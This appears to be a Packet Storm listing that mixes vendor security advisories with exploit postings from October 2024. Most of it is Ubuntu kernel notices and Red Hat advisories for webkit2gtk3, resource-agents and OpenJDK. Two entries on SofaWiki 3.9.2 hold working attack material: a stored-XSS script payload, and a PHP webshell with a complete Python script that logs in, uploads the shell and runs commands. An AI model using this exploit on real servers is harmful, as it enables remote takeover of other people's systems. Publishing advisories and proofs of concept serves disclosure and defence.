Ubuntu Security Notice 7073-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7073-1October 16, 2024linux, linux-aws, linux-aws-5.4, linux-bluefield, linux-gcp,linux-gcp-5.4, linux-gkeop, linux-hwe-5.4, linux-ibm, linux-ibm-5.4,linux-kvm, linux-oracle, linux-oracle-5.4, linux-raspi, linux-raspi-5.4,linux-xilinx-zynqmp vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-bluefield: Linux kernel for NVIDIA BlueField platforms- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-xilinx-zynqmp: Linux kernel for Xilinx ZynqMP processors- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-ibm-5.4: Linux kernel for IBM cloud systems- linux-oracle-5.4: Linux kernel for Oracle Cloud systems- linux-raspi-5.4: Linux kernel for Raspberry Pi systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - Watchdog drivers;  - Netfilter;  - Memory management;  - Network traffic control;(CVE-2024-27397, CVE-2024-38630, CVE-2024-45016, CVE-2024-26960)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.4.0-1053-xilinx-zynqmp  5.4.0-1053.57  linux-image-5.4.0-1081-ibm      5.4.0-1081.86  linux-image-5.4.0-1094-bluefield  5.4.0-1094.101  linux-image-5.4.0-1101-gkeop    5.4.0-1101.105  linux-image-5.4.0-1118-raspi    5.4.0-1118.130  linux-image-5.4.0-1122-kvm      5.4.0-1122.130  linux-image-5.4.0-1133-oracle   5.4.0-1133.142  linux-image-5.4.0-1134-aws      5.4.0-1134.144  linux-image-5.4.0-1138-gcp      5.4.0-1138.147  linux-image-5.4.0-198-generic   5.4.0-198.218  linux-image-5.4.0-198-generic-lpae  5.4.0-198.218  linux-image-5.4.0-198-lowlatency  5.4.0-198.218  linux-image-aws-lts-20.04       5.4.0.1134.131  linux-image-bluefield           5.4.0.1094.90  linux-image-gcp-lts-20.04       5.4.0.1138.140  linux-image-generic             5.4.0.198.196  linux-image-generic-lpae        5.4.0.198.196  linux-image-gkeop               5.4.0.1101.99  linux-image-gkeop-5.4           5.4.0.1101.99  linux-image-ibm-lts-20.04       5.4.0.1081.110  linux-image-kvm                 5.4.0.1122.118  linux-image-lowlatency          5.4.0.198.196  linux-image-oem                 5.4.0.198.196  linux-image-oem-osp1            5.4.0.198.196  linux-image-oracle-lts-20.04    5.4.0.1133.126  linux-image-raspi               5.4.0.1118.148  linux-image-raspi2              5.4.0.1118.148  linux-image-virtual             5.4.0.198.196  linux-image-xilinx-zynqmp       5.4.0.1053.53Ubuntu 18.04 LTS  linux-image-5.4.0-1081-ibm      5.4.0-1081.86~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-1118-raspi    5.4.0-1118.130~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-1133-oracle   5.4.0-1133.142~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-1134-aws      5.4.0-1134.144~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-1138-gcp      5.4.0-1138.147~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-198-generic   5.4.0-198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-198-lowlatency  5.4.0-198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-aws                 5.4.0.1134.144~18.04.1                                  Available with Ubuntu Pro  linux-image-gcp                 5.4.0.1138.147~18.04.1                                  Available with Ubuntu Pro  linux-image-generic-hwe-18.04   5.4.0.198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-ibm                 5.4.0.1081.86~18.04.1                                  Available with Ubuntu Pro  linux-image-lowlatency-hwe-18.04  5.4.0.198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-oem                 5.4.0.198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-oem-osp1            5.4.0.198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-oracle              5.4.0.1133.142~18.04.1                                  Available with Ubuntu Pro  linux-image-raspi-hwe-18.04     5.4.0.1118.130~18.04.1                                  Available with Ubuntu Pro  linux-image-snapdragon-hwe-18.04  5.4.0.198.218~18.04.1                                  Available with Ubuntu Pro  linux-image-virtual-hwe-18.04   5.4.0.198.218~18.04.1                                  Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7073-1  CVE-2024-26960, CVE-2024-27397, CVE-2024-38630, CVE-2024-45016Package Information:  https://launchpad.net/ubuntu/+source/linux/5.4.0-198.218  https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1134.144  https://launchpad.net/ubuntu/+source/linux-bluefield/5.4.0-1094.101  https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1138.147  https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1101.105  https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1081.86  https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1122.130  https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1133.142  https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1118.130  https://launchpad.net/ubuntu/+source/linux-xilinx-zynqmp/5.4.0-1053.57

Ubuntu Security Notice USN-7073-1

Red Hat Security Advisory 2024-8180-03 - An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 9.4 Extended Update Support. Issues addressed include code execution, out of bounds read, spoofing, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8180.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: webkit2gtk3 security update  
Advisory ID:        RHSA-2024:8180-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8180  
Issue date:         2024-10-16  
Revision:           03  
CVE Names:          CVE-2024-23271  
====================================================================

Summary: 

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 9.4 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.

Security Fix(es):

* webkitgtk: webkit2gtk: Use after free may lead to Remote Code Execution (CVE-2024-40776)

* webkitgtk: webkit2gtk: Processing maliciously crafted web content may lead to an unexpected process crash (CVE-2024-40789)

* webkitgtk: webkit2gtk: Out-of-bounds read was addressed with improved bounds checking (CVE-2024-40780)

* webkitgtk: webkit2gtk: Out-of-bounds read was addressed with improved bounds checking (CVE-2024-40779)

* webkitgtk: webkit2gtk: Use-after-free was addressed with improved memory management (CVE-2024-40782)

* webkitgtk: Visiting a malicious website may lead to address bar spoofing (CVE-2024-40866)

* webkitgtk: A malicious website may cause unexpected cross-origin behavior (CVE-2024-23271)

* webkitgtk: Processing web content may lead to arbitrary code execution (CVE-2024-27820)

* webkitgtk: A maliciously crafted webpage may be able to fingerprint the user (CVE-2024-27838)

* webkitgtk: Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2024-27851)

* webkitgtk: A malicious website may exfiltrate data cross-origin (CVE-2024-44187)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-23271

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2301841  
https://bugzilla.redhat.com/show_bug.cgi?id=2302067  
https://bugzilla.redhat.com/show_bug.cgi?id=2302069  
https://bugzilla.redhat.com/show_bug.cgi?id=2302070  
https://bugzilla.redhat.com/show_bug.cgi?id=2302071  
https://bugzilla.redhat.com/show_bug.cgi?id=2312724  
https://bugzilla.redhat.com/show_bug.cgi?id=2314696  
https://bugzilla.redhat.com/show_bug.cgi?id=2314698  
https://bugzilla.redhat.com/show_bug.cgi?id=2314702  
https://bugzilla.redhat.com/show_bug.cgi?id=2314704  
https://bugzilla.redhat.com/show_bug.cgi?id=2314706

Red Hat Security Advisory 2024-8180-03

Red Hat Security Advisory 2024-8179-03 - An update for resource-agents is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8179.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: resource-agents security updateAdvisory ID:        RHSA-2024:8179-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8179Issue date:         2024-10-16Revision:           03CVE Names:          CVE-2024-6345====================================================================Summary: An update for resource-agents is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The resource-agents packages provide the Pacemaker and RGManager service managers with a set of scripts. These scripts interface with several services to allow operating in a high-availability (HA) environment.Security Fix(es):* pypa/setuptools: Remote code execution via download functions in the package_index module in pypa/setuptools (CVE-2024-6345)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6345References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2297771

Red Hat Security Advisory 2024-8179-03

Red Hat Security Advisory 2024-8129-03 - An update is now available for OpenJDK. Issues addressed include buffer overflow and integer overflow vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8129.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenJDK 21.0.5 Security Update for Windows Builds  
Advisory ID:        RHSA-2024:8129-03  
Product:            OpenJDK  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8129  
Issue date:         2024-10-17  
Revision:           03  
CVE Names:          CVE-2023-48161  
====================================================================

Summary: 

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The OpenJDK 21 packages provide the OpenJDK 21 Java Runtime Environment and the OpenJDK 21 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 21 (21.0.5) for Windows serves as a replacement for the Red Hat build of OpenJDK 21 (21.0.4) and includes security and bug fixes. For further information, refer to the release notes linked to in the References section.

Security Fix(es):

* giflib: Heap-Buffer Overflow during Image Saving in DumpScreen2RGB Function (CVE-2023-48161)

* OpenJDK: Array indexing integer overflow (8328544) (CVE-2024-21210)

* OpenJDK: HTTP client improper handling of maxHeaderSize (8328286) (CVE-2024-21208)

* OpenJDK: Unbounded allocation leads to out-of-memory error (8331446) (CVE-2024-21217)

* OpenJDK:  Integer conversion error leads to incorrect range check (8332644) (CVE-2024-21235)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-48161

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2251025  
https://bugzilla.redhat.com/show_bug.cgi?id=2318524  
https://bugzilla.redhat.com/show_bug.cgi?id=2318526  
https://bugzilla.redhat.com/show_bug.cgi?id=2318530  
https://bugzilla.redhat.com/show_bug.cgi?id=2318534

Red Hat Security Advisory 2024-8129-03

Red Hat Security Advisory 2024-8128-03 - An update is now available for OpenJDK. Issues addressed include buffer overflow and integer overflow vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8128.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenJDK 21.0.5 Security Update for Portable Linux Builds  
Advisory ID:        RHSA-2024:8128-03  
Product:            OpenJDK  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8128  
Issue date:         2024-10-17  
Revision:           03  
CVE Names:          CVE-2023-48161  
====================================================================

Summary: 

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The OpenJDK 21 packages provide the OpenJDK 21 Java Runtime Environment and the OpenJDK 21 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 21 (21.0.5) for portable Linux serves as a replacement for the Red Hat build of OpenJDK 21 (21.0.4) and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.

Security Fix(es):

* giflib: Heap-Buffer Overflow during Image Saving in DumpScreen2RGB Function  
(CVE-2023-48161)

* OpenJDK: Array indexing integer overflow (8328544) (CVE-2024-21210)

* OpenJDK: HTTP client improper handling of maxHeaderSize (8328286)  
(CVE-2024-21208)

* OpenJDK: Unbounded allocation leads to out-of-memory error (8331446)  
(CVE-2024-21217)

* OpenJDK:  Integer conversion error leads to incorrect range check (8332644)  
(CVE-2024-21235)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-48161

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2251025  
https://bugzilla.redhat.com/show_bug.cgi?id=2318524  
https://bugzilla.redhat.com/show_bug.cgi?id=2318526  
https://bugzilla.redhat.com/show_bug.cgi?id=2318530  
https://bugzilla.redhat.com/show_bug.cgi?id=2318534

Red Hat Security Advisory 2024-8128-03

SofaWiki version 3.9.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: SofaWiki 3.9.2 - Stored XSS (Authenticated)# Date: 10/17/2024# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.sofawiki.com# Software Link: https://www.sofawiki.com/site/files/snapshot.zip# Version: 3.9.2# Tested on: Windows XPSummary:A stored XSS exists in SofaWiki's Open Ticket feature. An authenticateduser can inject a JavaScript payload into the ticket's title field, whichtriggers whenever the ticket is viewed.Proof of Concept (PoC):1. Login and go to New Ticket:http://localhost/sofawiki/index.php?name=special:tickets&ticketaction=new2. Use this payload in the Title field:<script>alert('XSS');</script>3. Click Open Ticket the alert will be triggered.The payload runs each time the ticket is opened.

SofaWiki 3.9.2 Cross Site Scripting

Red Hat Security Advisory 2024-8127-03 - An update for java-21-openjdk is now available for Red Hat Enterprise Linux 8 and Red Hat Enterprise Linux 9. Issues addressed include buffer overflow and integer overflow vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8127.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: java-21-openjdk security update  
Advisory ID:        RHSA-2024:8127-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8127  
Issue date:         2024-10-17  
Revision:           03  
CVE Names:          CVE-2023-48161  
====================================================================

Summary: 

An update for java-21-openjdk is now available for Red Hat Enterprise Linux 8 and Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The OpenJDK 21 runtime environment.

Security Fix(es):

* giflib: Heap-Buffer Overflow during Image Saving in DumpScreen2RGB Function (CVE-2023-48161)

* JDK: Array indexing integer overflow (8328544) (CVE-2024-21210)

* JDK: HTTP client improper handling of maxHeaderSize (8328286) (CVE-2024-21208)

* JDK: Unbounded allocation leads to out-of-memory error (8331446) (CVE-2024-21217)

* JDK: Integer conversion error leads to incorrect range check (8332644) (CVE-2024-21235)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-48161

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2251025  
https://bugzilla.redhat.com/show_bug.cgi?id=2318524  
https://bugzilla.redhat.com/show_bug.cgi?id=2318526  
https://bugzilla.redhat.com/show_bug.cgi?id=2318530  
https://bugzilla.redhat.com/show_bug.cgi?id=2318534

Red Hat Security Advisory 2024-8127-03

SofaWiki version 3.9.2 suffers from a remote shell upload vulnerability.

    # Exploit Title: SofaWiki 3.9.2 - Remote Code Execution (RCE) via Open Ticket File Upload# Date: 10/17/2024# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.sofawiki.com# Software Link: https://www.sofawiki.com/site/files/snapshot.zip# Version: 3.9.2# Tested on: Windows XPSummary:A remote code execution (RCE) vulnerability exists in the Open Ticketfeature of SofaWiki 3.9.2. An attacker can upload a malicious `.phar` filethat contains PHP code, bypassing `.htaccess` restrictions, and executearbitrary commands on the server.Exploit Steps:1. Login to SofaWiki.2. Navigate to Special → Tickets → New Ticket:http://localhost/sofawiki/index.php?name=special:tickets&ticketaction=new3. Select your shell.phar file with this content:   <?php system($_GET['cmd']); ?>4. Fill in the ticket title and click Open Ticket.5. After the ticket is created, the page shows a link to the uploadedshell.phar6. access the webshell:http://localhost/sofawiki/site/files/ticket-1-shell.phar?cmd=whoami--------------# Exploit Title: SofaWiki 3.9.2 - RCE (authenticated) via Open Ticket File Upload  Exploit# Date: 10/17/2024# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.sofawiki.com# Software Link: https://www.sofawiki.com/site/files/snapshot.zip# Version: 3.9.2# Tested on: Windows XPimport requestsimport reimport sysclass SofaWikiExploit:    def __init__(self, base_url, username, password):        self.base_url = base_url.rstrip('/')        self.username = username        self.password = password        self.session = requests.Session()    def detect_login_name(self):        response =self.session.get(f"{self.base_url}/index.php?action=login")        match = re.search(r'name="name" value="([^"]+)"', response.text)        if not match:            print("\033[91m\033[1m[-] couldn't find the 'name' field.Exiting.\033[0m")            sys.exit(1)        return match.group(1)    def login(self):        print("\033[93m[*] logging in...\033[0m")        login_name = self.detect_login_name()        data = {            "submitlogin": "Login",            "username": self.username,            "pass": self.password,            "name": login_name,            "action": "login"        }        response = self.session.post(f"{self.base_url}/index.php",data=data)        if "Logout" in response.text:            print("\033[92m\033[1m[+] Login successful!\033[0m")            return True        print("\033[91m[-] login failed.\033[0m")        return False    def upload_shell(self):        print("\033[93m[*] uploading shell...\033[0m")        shell_content = '<?php system($_GET["cmd"]); ?>'        files = {            'uploadedfile': ('shell.phar', shell_content,'application/octet-stream'),            'title': (None, 'Chokri Hammedi Exploit'),            'text': (None, 'Chokri Hammedi RCE'),            'assigned': (None, 'admin'),            'priority': (None, '1 high'),            'submitopen': (None, 'Open Ticket'),            'MAX_FILE_SIZE': (None, '8000000')        }        response =self.session.post(f"{self.base_url}/index.php?name=special:tickets",files=files)        match = re.search(r'File (.*?) uploaded', response.text)        if not match:            print("\033[91m[-] shell upload failed.\033[0m")            sys.exit(1)        shell_url = f"{self.base_url}/site/files/{match.group(1)}"        print(f"\033[92m[+] shell uploaded: {shell_url}\033[0m")        return shell_url    def execute_command(self, shell_url, cmd):        print(f"\033[93m[*] running command: {cmd}\033[0m")        response = self.session.get(f"{shell_url}?cmd={cmd}")        print("\033[92m[+] command output:\033[0m")        print(f"\033[1m{response.text}\033[0m")if __name__ == "__main__":    if len(sys.argv) != 5:        print(f"\033[91musage: {sys.argv[0]} <target_url> <username><password> <cmd>\033[0m")        sys.exit(1)    target_url, username, password, cmd = sys.argv[1:5]    exploit = SofaWikiExploit(target_url, username, password)    if exploit.login():        shell_url = exploit.upload_shell()        exploit.execute_command(shell_url, cmd)

SofaWiki 3.9.2 Shell Upload

Red Hat Security Advisory 2024-8126-03 - An update is now available for OpenJDK. Issues addressed include buffer overflow and integer overflow vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8126.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenJDK 17.0.13 Security Update for Windows Builds  
Advisory ID:        RHSA-2024:8126-03  
Product:            OpenJDK  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8126  
Issue date:         2024-10-17  
Revision:           03  
CVE Names:          CVE-2023-48161  
====================================================================

Summary: 

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The OpenJDK 17 packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 17 (17.0.13) for Windows serves as a replacement for the Red Hat build of OpenJDK 17 (17.0.12) and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.

Security Fix(es):

* giflib: Heap-Buffer Overflow during Image Saving in DumpScreen2RGB Function (CVE-2023-48161)

* OpenJDK: Array indexing integer overflow (8328544) (CVE-2024-21210)

* OpenJDK: HTTP client improper handling of maxHeaderSize (8328286) (CVE-2024-21208)

* OpenJDK: Unbounded allocation leads to out-of-memory error (8331446) (CVE-2024-21217)

* OpenJDK:  Integer conversion error leads to incorrect range check (8332644) (CVE-2024-21235)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-48161

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2251025  
https://bugzilla.redhat.com/show_bug.cgi?id=2318524  
https://bugzilla.redhat.com/show_bug.cgi?id=2318526  
https://bugzilla.redhat.com/show_bug.cgi?id=2318530  
https://bugzilla.redhat.com/show_bug.cgi?id=2318534

Red Hat Security Advisory 2024-8126-03

Ubuntu Security Notice 7072-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7072-1October 16, 2024linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gkeop,linux-gkeop-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15,linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm, linux-lowlatency,linux-lowlatency-hwe-5.15, linux-nvidia, linux-oracle, linux-oracle-5.15,linux-raspi, linux-xilinx-zynqmp vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-intel-iotg: Linux kernel for Intel IoT platforms- linux-kvm: Linux kernel for cloud environments- linux-lowlatency: Linux low latency kernel- linux-nvidia: Linux kernel for NVIDIA systems- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-xilinx-zynqmp: Linux kernel for Xilinx ZynqMP processors- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-hwe-5.15: Linux hardware enablement (HWE) kernel- linux-ibm-5.15: Linux kernel for IBM cloud systems- linux-intel-iotg-5.15: Linux kernel for Intel IoT platforms- linux-lowlatency-hwe-5.15: Linux low latency kernel- linux-oracle-5.15: Linux kernel for Oracle Cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - Watchdog drivers;  - Netfilter;  - Network traffic control;(CVE-2024-38630, CVE-2024-27397, CVE-2024-45016)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  linux-image-5.15.0-1037-xilinx-zynqmp  5.15.0-1037.41  linux-image-5.15.0-1054-gkeop   5.15.0-1054.61  linux-image-5.15.0-1064-ibm     5.15.0-1064.67  linux-image-5.15.0-1064-raspi   5.15.0-1064.67  linux-image-5.15.0-1066-intel-iotg  5.15.0-1066.72  linux-image-5.15.0-1066-nvidia  5.15.0-1066.67  linux-image-5.15.0-1066-nvidia-lowlatency  5.15.0-1066.67  linux-image-5.15.0-1068-kvm     5.15.0-1068.73  linux-image-5.15.0-1069-oracle  5.15.0-1069.75  linux-image-5.15.0-1070-gcp     5.15.0-1070.78  linux-image-5.15.0-1071-aws     5.15.0-1071.77  linux-image-5.15.0-124-generic  5.15.0-124.134  linux-image-5.15.0-124-generic-64k  5.15.0-124.134  linux-image-5.15.0-124-generic-lpae  5.15.0-124.134  linux-image-5.15.0-124-lowlatency  5.15.0-124.134  linux-image-5.15.0-124-lowlatency-64k  5.15.0-124.134  linux-image-aws-lts-22.04       5.15.0.1071.71  linux-image-gcp-lts-22.04       5.15.0.1070.66  linux-image-generic             5.15.0.124.124  linux-image-generic-64k         5.15.0.124.124  linux-image-generic-lpae        5.15.0.124.124  linux-image-gkeop               5.15.0.1054.53  linux-image-gkeop-5.15          5.15.0.1054.53  linux-image-ibm                 5.15.0.1064.60  linux-image-intel-iotg          5.15.0.1066.66  linux-image-kvm                 5.15.0.1068.64  linux-image-lowlatency          5.15.0.124.112  linux-image-lowlatency-64k      5.15.0.124.112  linux-image-nvidia              5.15.0.1066.66  linux-image-nvidia-lowlatency   5.15.0.1066.66  linux-image-oracle-lts-22.04    5.15.0.1069.65  linux-image-raspi               5.15.0.1064.62  linux-image-raspi-nolpae        5.15.0.1064.62  linux-image-virtual             5.15.0.124.124  linux-image-xilinx-zynqmp       5.15.0.1037.41Ubuntu 20.04 LTS  linux-image-5.15.0-1054-gkeop   5.15.0-1054.61~20.04.1  linux-image-5.15.0-1064-ibm     5.15.0-1064.67~20.04.1  linux-image-5.15.0-1066-intel-iotg  5.15.0-1066.72~20.04.1  linux-image-5.15.0-1069-oracle  5.15.0-1069.75~20.04.1  linux-image-5.15.0-1070-gcp     5.15.0-1070.78~20.04.1  linux-image-5.15.0-1071-aws     5.15.0-1071.77~20.04.1  linux-image-5.15.0-124-generic  5.15.0-124.134~20.04.1  linux-image-5.15.0-124-generic-64k  5.15.0-124.134~20.04.1  linux-image-5.15.0-124-generic-lpae  5.15.0-124.134~20.04.1  linux-image-5.15.0-124-lowlatency  5.15.0-124.134~20.04.1  linux-image-5.15.0-124-lowlatency-64k  5.15.0-124.134~20.04.1  linux-image-aws                 5.15.0.1071.77~20.04.1  linux-image-gcp                 5.15.0.1070.78~20.04.1  linux-image-generic-64k-hwe-20.04  5.15.0.124.134~20.04.1  linux-image-generic-hwe-20.04   5.15.0.124.134~20.04.1  linux-image-generic-lpae-hwe-20.04  5.15.0.124.134~20.04.1  